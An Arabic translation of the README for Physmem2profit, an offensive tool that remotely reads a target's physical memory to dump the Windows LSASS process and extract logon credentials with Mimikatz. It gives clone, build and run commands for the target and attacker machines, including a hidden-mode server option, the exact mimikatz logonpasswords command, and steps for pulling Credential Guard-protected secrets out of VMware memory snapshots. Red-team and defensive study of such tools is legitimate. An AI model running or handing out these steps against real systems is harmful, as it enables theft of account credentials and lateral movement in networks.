
Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely
يمكن استخدام Physmem2profit لإنشاء minidump لعملية LSASS على المضيف المستهدف عبر تحليل الذاكرة الفعلية عن بُعد. الهدف من هذا البحث هو اقتراح نهج بديل لسرقة بيانات الاعتماد وإنشاء إطار عمل نمطي يمكن توسيعه لدعم برامج تشغيل أخرى يمكنها الوصول إلى الذاكرة الفعلية. يُنشئ Physmem2profit ملف minidump (.dmp) لعملية LSASS يمكن تحليله لاحقًا باستخدام Mimikatz. لا تتطلب الأداة Cobalt Strike ولكن يجب أن تعمل بشكل جيد عبر beacon مع وكيل SOCKS.
الفكرة موضحة أدناه:

تتكون الأداة من مكوّنين:
physmem2profit.exe، ويُنفَّذ على المضيف المستهدف
physmem2profit، ويُنفَّذ على الجهاز المهاجِم
--mode mount، يتصل بالجهاز المستهدف ويقوم بتركيب الذاكرة الفعلية للمضيف المستهدف كملف خام بمساعدة FUSE--mode dump، يستدعي العديد من إضافات Rekall لتحليل صورة الذاكرة وإنشاء minidump لعملية LSASS.--mode all، ينفّذ كل الإجراءات المذكورة أعلاه. سيتم إغلاق الاتصال بالخادم عند اكتمال التفريغ.git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.gitphysmem2profit/server/Physmem2profit.sln باستخدام Visual Studiobash physmem2profit/client/install.shphysmem2profit.exe [--ip IP] [-p PORT] [--hidden] [--verbose] على الجهاز المستهدف بصلاحيات المسؤول.
source physmem2profit/client/.env/bin/activate على الجهاز المهاجِم. سيعمل هذا الأمر على تفعيل البيئة الافتراضية (virtualenv) التي أنشأها install.sh.cd physmem2profit/client ثم python3 physmem2profit --host HOST [--port PORT] [--mode MODE] [--driver DRIVER ] [--instal DRIVER_PATH_ON_TARGET] [--label LABEL_FOR_MEMORY_DUMP] على الجهاز المهاجِم
physmem2profit.exe قيد التشغيل على الجهاز المستهدف قبل تنفيذ هذا الأمر.output/[label]-[date]-lsass.dmp على الجهاز المهاجِم.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"يتطلب فك تشفير بيانات الاعتماد المحمية بواسطة Credential Guard الوصول إلى مفتاح التشفير المخزّن في العالم الآمن (Secure World). لأغراض الاختبار، يدعم Physmem2profit استرجاع البيانات من العالم الآمن من لقطات VMware Fusion/Workstation (ملفات .vmem). يتيح ذلك فك تشفير بيانات الاعتماد المحمية بواسطة Credential Guard بمساعدة Mimikatz.
msinfo32 للتأكد من أن Virtualization-based security Services Running يعرض Credential Guardpython3 physmem2profit --mode dump --vmem /tmp/Win10-Snapshot1.vmem --label credential-guard-test
output/[label]-[date]-lsass.dmp. يحتوي ملف minidump على تدفق خاص يحمل البيانات من العالم الآمن، مما يسمح لـ Mimikatz بتحديد موقع مفتاح التشفير.output/[label]-[date]-secure-world.raw.mimikatz.exe "sekurlsa::minidump [label]-[date]-lsass.dmp" "sekurlsa::logonpasswords" "exit"الدعم لتجاوز Credential Guard من خلال استغلال ثغرة البرنامج الثابت S3 Resume، والذي تم عرضه في حديثنا في Disobey، قادم قريبًا :).
إعادة التفكير في سرقة بيانات الاعتماد | منشور مدونة يشرح لماذا تم اختيار هذا النهج لسرقة بيانات الاعتماد.
تم تطوير Physmem2profit بواسطة @b3arr0 و @TimoHirvonen.
شكر خاص للمساهمين: